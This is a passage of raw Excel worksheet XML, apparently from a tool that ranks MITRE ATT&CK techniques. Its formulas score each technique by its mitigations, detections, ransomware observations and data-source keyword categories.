        <f t="array" ref="AF218">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC218)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG218" s="25">
        <f>IF(AF218="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH218" s="25" t="str" cm="1">
        <f t="array" ref="AH218">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC218)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI218" s="25">
        <f>IF(AH218="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ218" s="25" t="str" cm="1">
        <f t="array" ref="AJ218">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC218)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK218" s="25">
        <f>IF(AJ218="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL218" s="25" t="str" cm="1">
        <f t="array" ref="AL218">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC218)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM218" s="25">
        <f>IF(AL218="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN218" s="60">
        <v>0</v>
      </c>
      <c r="AO218" s="51">
        <v>0</v>
      </c>
      <c r="AP218" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.1800000000000011E-2</v>
      </c>
      <c r="AQ218" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.13933333333333336</v>
      </c>
      <c r="AR218" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.13933333333333336</v>
      </c>
      <c r="AS218" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT218" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU21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19" spans="1:47" ht="32.1">
      <c r="A219" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.7651428571428579E-2</v>
      </c>
      <c r="B219" s="25">
        <f>SUM(H219,M219,V219)*(1+SUM(AE219,AG219,AI219,AK219,AM219))</f>
        <v>0.37651428571428575</v>
      </c>
      <c r="C219" s="25" t="s">
        <v>957</v>
      </c>
      <c r="D219" s="25" t="s">
        <v>435</v>
      </c>
      <c r="E219" s="25" t="s">
        <v>958</v>
      </c>
      <c r="F219" s="51">
        <v>1</v>
      </c>
      <c r="G219" s="51">
        <v>1</v>
      </c>
      <c r="H219" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I219">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J219">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K219">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L219">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M219" s="25">
        <v>0</v>
      </c>
      <c r="N219" s="51">
        <v>0</v>
      </c>
      <c r="O219" s="51">
        <v>1</v>
      </c>
      <c r="P219" s="51">
        <v>0</v>
      </c>
      <c r="Q219" s="51">
        <v>0</v>
      </c>
      <c r="R219" s="52" t="s">
        <v>436</v>
      </c>
      <c r="S219" s="51">
        <v>10</v>
      </c>
      <c r="T219" s="51" t="s">
        <v>959</v>
      </c>
      <c r="U219" s="51">
        <v>12</v>
      </c>
      <c r="V219" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.21428571428571433</v>
      </c>
      <c r="W219">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>22</v>
      </c>
      <c r="X219">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.4</v>
      </c>
      <c r="Y219">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.4</v>
      </c>
      <c r="Z219">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA219">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB219">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC219" s="29" t="s">
        <v>206</v>
      </c>
      <c r="AD219" s="25" t="str" cm="1">
        <f t="array" ref="AD219">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC219)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE219" s="25">
        <f>IF(AD219="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF219" s="25" t="str" cm="1">
        <f t="array" ref="AF219">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC219)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG219" s="25">
        <f>IF(AF219="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH219" s="25" t="str" cm="1">
        <f t="array" ref="AH219">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC219)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI219" s="25">
        <f>IF(AH219="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ219" s="25" t="str" cm="1">
        <f t="array" ref="AJ219">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC219)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK219" s="25">
        <f>IF(AJ219="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL219" s="25" t="str" cm="1">
        <f t="array" ref="AL219">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC219)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM219" s="25">
        <f>IF(AL219="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN219" s="58">
        <v>0</v>
      </c>
      <c r="AO219" s="51">
        <v>0</v>
      </c>
      <c r="AP219" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.7651428571428579E-2</v>
      </c>
      <c r="AQ219" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.12550476190476192</v>
      </c>
      <c r="AR219" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.12550476190476192</v>
      </c>
      <c r="AS219" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT219" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU21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20" spans="1:47">
      <c r="A220" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.7651428571428579E-2</v>
      </c>
      <c r="B220" s="25">
        <f>SUM(H220,M220,V220)*(1+SUM(AE220,AG220,AI220,AK220,AM220))</f>
        <v>0.37651428571428575</v>
      </c>
      <c r="C220" s="25" t="s">
        <v>960</v>
      </c>
      <c r="D220" s="25" t="s">
        <v>233</v>
      </c>
      <c r="E220" s="25" t="s">
        <v>961</v>
      </c>
      <c r="F220" s="51">
        <v>1</v>
      </c>
      <c r="G220" s="51">
        <v>1</v>
      </c>
      <c r="H220" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I220">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J220">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K220">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L220">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M220" s="25">
        <v>0</v>
      </c>
      <c r="N220" s="51">
        <v>0</v>
      </c>
      <c r="O220" s="51">
        <v>1</v>
      </c>
      <c r="P220" s="51">
        <v>0</v>
      </c>
      <c r="Q220" s="51">
        <v>0</v>
      </c>
      <c r="R220" s="52" t="s">
        <v>962</v>
      </c>
      <c r="S220" s="51">
        <v>9</v>
      </c>
      <c r="T220" s="51" t="s">
        <v>963</v>
      </c>
      <c r="U220" s="51">
        <v>13</v>
      </c>
      <c r="V220" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.21428571428571433</v>
      </c>
      <c r="W220">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>22</v>
      </c>
      <c r="X220">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.4</v>
      </c>
      <c r="Y220">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.4</v>
      </c>
      <c r="Z220">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA220">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB220">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC220" s="29" t="s">
        <v>964</v>
      </c>
      <c r="AD220" s="25" t="str" cm="1">
        <f t="array" ref="AD220">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC220)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE220" s="25">
        <f>IF(AD220="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF220" s="25" t="str" cm="1">
        <f t="array" ref="AF220">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC220)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG220" s="25">
        <f>IF(AF220="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH220" s="25" t="str" cm="1">
        <f t="array" ref="AH220">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC220)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI220" s="25">
        <f>IF(AH220="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ220" s="25" t="str" cm="1">
        <f t="array" ref="AJ220">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC220)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK220" s="25">
        <f>IF(AJ220="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL220" s="25" t="str" cm="1">
        <f t="array" ref="AL220">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC220)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM220" s="25">
        <f>IF(AL220="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN220" s="60">
        <v>0</v>
      </c>
      <c r="AO220" s="51">
        <v>0</v>
      </c>
      <c r="AP220" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.7651428571428579E-2</v>
      </c>
      <c r="AQ220" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.12550476190476192</v>
      </c>
      <c r="AR220" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.12550476190476192</v>
      </c>
      <c r="AS220" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT220" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU22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21" spans="1:47" ht="32.1">
      <c r="A221" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11468952380952381</v>
      </c>
      <c r="B221" s="25">
        <f>SUM(H221,M221,V221)*(1+SUM(AE221,AG221,AI221,AK221,AM221))</f>
        <v>0.48022857142857145</v>
      </c>
      <c r="C221" s="25" t="s">
        <v>965</v>
      </c>
      <c r="D221" s="25" t="s">
        <v>119</v>
      </c>
      <c r="E221" s="25" t="s">
        <v>966</v>
      </c>
      <c r="F221" s="51">
        <v>1</v>
      </c>
      <c r="G221" s="51">
        <v>1</v>
      </c>
      <c r="H221" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I221">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J221">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K221">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L221">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M221" s="25">
        <v>0</v>
      </c>
      <c r="N221" s="51">
        <v>1</v>
      </c>
      <c r="O221" s="51">
        <v>12</v>
      </c>
      <c r="P221" s="51">
        <v>0</v>
      </c>
      <c r="Q221" s="51">
        <v>6</v>
      </c>
      <c r="R221" s="53" t="s">
        <v>967</v>
      </c>
      <c r="S221" s="51">
        <v>5</v>
      </c>
      <c r="T221" s="51" t="s">
        <v>968</v>
      </c>
      <c r="U221" s="51">
        <v>8</v>
      </c>
      <c r="V221" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.2142857142857143</v>
      </c>
      <c r="W221">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>13</v>
      </c>
      <c r="X221">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Y221">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Z221">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>19</v>
      </c>
      <c r="AA221">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.19</v>
      </c>
      <c r="AB221">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.19</v>
      </c>
      <c r="AC221" s="29" t="s">
        <v>969</v>
      </c>
      <c r="AD221" s="25" t="str" cm="1">
        <f t="array" ref="AD221">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC221)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE221" s="25">
        <f>IF(AD221="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF221" s="25" t="str" cm="1">
        <f t="array" ref="AF221">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC221)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG221" s="25">
        <f>IF(AF221="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH221" s="25" t="str" cm="1">
        <f t="array" ref="AH221">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC221)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI221" s="25">
        <f>IF(AH221="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ221" s="25" t="str" cm="1">
        <f t="array" ref="AJ221">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC221)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AK221" s="25">
        <f>IF(AJ221="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AL221" s="25" t="str" cm="1">
        <f t="array" ref="AL221">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC221)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM221" s="25">
        <f>IF(AL221="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN221" s="58">
        <v>2</v>
      </c>
      <c r="AO221" s="51">
        <v>1</v>
      </c>
      <c r="AP221" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11468952380952381</v>
      </c>
      <c r="AQ221" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.16007619047619048</v>
      </c>
      <c r="AR221" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.16007619047619048</v>
      </c>
      <c r="AS221" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT221" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU22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22" spans="1:47">
      <c r="A222" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.8910476190476189E-2</v>
      </c>
      <c r="B222" s="25">
        <f>SUM(H222,M222,V222)*(1+SUM(AE222,AG222,AI222,AK222,AM222))</f>
        <v>0.35577142857142863</v>
      </c>
      <c r="C222" s="25" t="s">
        <v>970</v>
      </c>
      <c r="D222" s="25" t="s">
        <v>863</v>
      </c>
      <c r="E222" s="25" t="s">
        <v>971</v>
      </c>
      <c r="F222" s="51">
        <v>1</v>
      </c>
      <c r="G222" s="51">
        <v>1</v>
      </c>
      <c r="H222" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I222">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J222">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K222">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L222">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M222" s="25">
        <v>0</v>
      </c>
      <c r="N222" s="51">
        <v>0</v>
      </c>
      <c r="O222" s="51">
        <v>2</v>
      </c>
      <c r="P222" s="51">
        <v>1</v>
      </c>
      <c r="Q222" s="51">
        <v>0</v>
      </c>
      <c r="R222" s="52" t="s">
        <v>797</v>
      </c>
      <c r="S222" s="51">
        <v>10</v>
      </c>
      <c r="T222" s="52" t="s">
        <v>972</v>
      </c>
      <c r="U222" s="51">
        <v>11</v>
      </c>
      <c r="V222" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.2142857142857143</v>
      </c>
      <c r="W222">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>21</v>
      </c>
      <c r="X222">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Y222">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Z222">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA222">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB222">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC222" s="29" t="s">
        <v>122</v>
      </c>
      <c r="AD222" s="25" t="str" cm="1">
        <f t="array" ref="AD222">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC222)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE222" s="25">
        <f>IF(AD222="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF222" s="25" t="str" cm="1">
        <f t="array" ref="AF222">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC222)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG222" s="25">
        <f>IF(AF222="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH222" s="25" t="str" cm="1">
        <f t="array" ref="AH222">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC222)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI222" s="25">
        <f>IF(AH222="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ222" s="25" t="str" cm="1">
        <f t="array" ref="AJ222">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC222)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK222" s="25">
        <f>IF(AJ222="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL222" s="25" t="str" cm="1">
        <f t="array" ref="AL222">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC222)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM222" s="25">
        <f>IF(AL222="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN222" s="60">
        <v>1</v>
      </c>
      <c r="AO222" s="51">
        <v>1</v>
      </c>
      <c r="AP222" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.8910476190476189E-2</v>
      </c>
      <c r="AQ222" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.1185904761904762</v>
      </c>
      <c r="AR222" s="25">
